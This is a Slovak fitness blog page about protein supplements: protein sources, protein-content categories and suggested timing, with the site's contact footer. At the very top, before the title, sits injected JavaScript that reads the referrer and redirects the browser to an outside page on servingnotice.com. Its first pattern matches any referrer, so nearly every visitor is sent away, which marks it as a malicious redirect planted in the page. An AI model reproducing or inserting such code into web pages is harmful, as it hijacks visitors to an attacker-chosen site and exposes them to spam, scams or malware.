var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/O7ul2v/intermediary.html?richubaidaninfo"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; Proteín – doplnok výživy pre kvalitu svalov | www.bodytrener.sk
Blog
...naučte sa niečo nové!

Proteín – doplnok výživy pre kvalitu svalov

Proteinovy doplnok výživy je zdrojom veľkého množstva bielkovín a nízkeho množstva sacharidov. Bielkoviny obsahujú látky, ktoré naše bunky a svaly potrebujú pre ďalší rast. Aminokyseliny sa nachádzajú v bielkovinách. Prostredníctvom kvalitného proteínové prípravku dostaneme do seba veľké množstvo aminokyselín, ktoré pomôžu ochrániť naše telo pred úbytkom svalovej hmoty, rýchlejšie ho budú regenerovať a hlavne dodajú svalom silu a nové prírastky.

Prečo kúpiť proteínový doplnok výživy?

Možno si poviete, že bielkoviny sa nachádzajú vo veľa potravinách a proteínový nápoj nepotrebujem, opak je však pravdou. Väčšinou vo svojich tréningoch a jedálničkoch uvádzam aby človek počas pravidelného tréningu, denne prijal 2g bielkovín na 1kg svojej váhy. U bežnéhp človeka, ktorý váži 80kg to znamená prijať 160g bielkovín za deň. 100g kuracích pŕs obsahuje okolo 24g bielkovín. Za deň by ste teda museli zjesť skoro 7 sto gramových kurčiat. Radšej použite proteínový prípravok, ktorý Vás celkovo vyjde lacnejšie ako toľko kusov kuracích pŕs.

Ako proteíny delíme?

Proteinové nápoje delíme podľa zdroja bielkovín na živočíšne (srvátka, mliečna, vaječná bielkovina a kaseín) a rastlinné (sója).

Podľa obsahu bielkovín v 100g výrobku, môžeme proteíny deliť do ďalších kategórii ako sú

  • 65 % bielkovinový proteín
  • Od 66 do 75% bielkovinový proteín
  • Od 76 do 85% bielkovinový proteín
  •  Viac ako 86% bielkovinový proteín

Do 65 % bielkovín:

Do tejto skupiny zaračujeme proteíny, ktoré sú určené viac pre ektomorfov(ťažko priberajú váhu). Takýto proteín je zložený z viacerých zdrojov bielkovín ako srvátka, kazeín, sója a pod.Proteíny z tejto kategórie sa vyznačujú aj vyšším množstvom sacharidov, ktoré pomôžu ektomorfom. Vhodné sú kedykoľvek počas dňa. Ak ich chcete užívať aj ako posledné jedlo pred spaním alebo náhradu jedla, takýto proteín by sa mal skaldať hlavne s kazeín, vaječných mliečnych bielkovín, ktoré sa pomalšie vstrebávajú do tela. Vhodné aj pre kulturistov mimo súťažnej prípravy. Pre endomorfov(ľahko priberajú váhu) nie je až taký vhodný a mali by sa skôr zameriavať na proteíny s vyšším obsahom bielkovín.

Od 66 do 75 % bielkovín:

Výrobcovia doplnkov výživy sa zameriavajú hlavne na túto skupinu proteínov. Určite v tejto skupine nájdete najväčší výber. Do tejto skupiny proteínových prípravkov zaraďujeme hlavne srvátkové, ktoré môžeme konzumovať kedykoľvek. V tejto skupine nájdete za výhodnú cenu skutočnú kvalitu. Vhodná pre ekto aj endomorfov.

Od 76 do 85 % bielkovín:

V tejto kategórii sa nachádzajú skutočne kvalitné proteíny, ktoré sa využívajú najmä v redukčnej fáze a v predsúťažnej príprave u kulturistov. Takýto vysokopercentný proteín môžete zamiešať i do rôznych jedál aby ste zvýšili príjem bielkovín. Do ovsených vločiek, niektorí si obľúbili aj proteínovú praženicu :)

Nad 86 % bielkovín:

Dostávame sa do najvyššieho levelu, tu nájdete to najkvalitnejšie, čo na trhu môžete kúpiť. Cena zodpovedá obsahu vo vnútri. Prevažná časť proteínov sú hydrolyzáty. Proteíny vhodné do predsúťažnej diéty a do diét s nízkym obsahom sacharidov. Kto nie je limitovaný financiami výborné riešenie a voľba proteínového koktailu. Ideálne ako prvé jedlo dňa a potréningový shake. Ak sa chcete telu odvďačiť po tvrdom tréningu, doprajte mu niečo z tejto skupiny.

Ako si vyberieme najvhodnejší proteinový nápoj?

Ak ste sa rozhodli zakúpiť si proteínový nápoj, ale neviete, ktorý by ste chceli, poradíme Vám.

Proteíny, ktoré sú vhodné:

  • na raňajky, pred, po tréningu sú srvátkové. Cenovo dostupné a hlavne sa rýchlo vstrebávajú. Môžu sa využiť aj pred spaním ako posledné jedlo, ale treba hľadať zloženie s väčším množstvom mliečnych, vaječných a kazeínových bielkovín.
  • pred spaním, náhrada jedla sú vaječné, mliečne a kazeínové. Vstrebávajú sa do tela pomalšie a preto sú vhodné pred spaním aby telo dostávalo počas spánku neustály prísun kvalitných bielkovín.
  • počas dňa sú sójové. Sójové proteíny by som zaraďoval ako alternatívu ku klasickým proteínom. Telo niekedy potrebuje zmenu a toto je správna voľba. Môžete to použiť ako náhradu jedla.

Naše služby zahŕňajú aj rady ohľadom doplnkov výživy a vybratia výrobkov presne pre Vás. Pozrite naše služby!

Pridať komentár




Odber noviniek

Pridajte sa k odberu noviniek a získajte najnovšie informácie o článkoch, zľavách a súťažiach.

Potrebujete pomoc?

Adresa:
Bodytrener.sk
Pažite 5
010 09 Žilina

Pracovná doba:
Pondelok – Piatok
10:00 – 18:00

E-mail: info@bodytrener.sk
Telefón: +421 904 569 865

Bankové účty:
2200359578/8330 - SLOVENSKO
2900359579/2010 - ČESKO

© 2013 Bodytrener.sk. Všetky práva vyhradené.

Pridaj si nás na Facebooku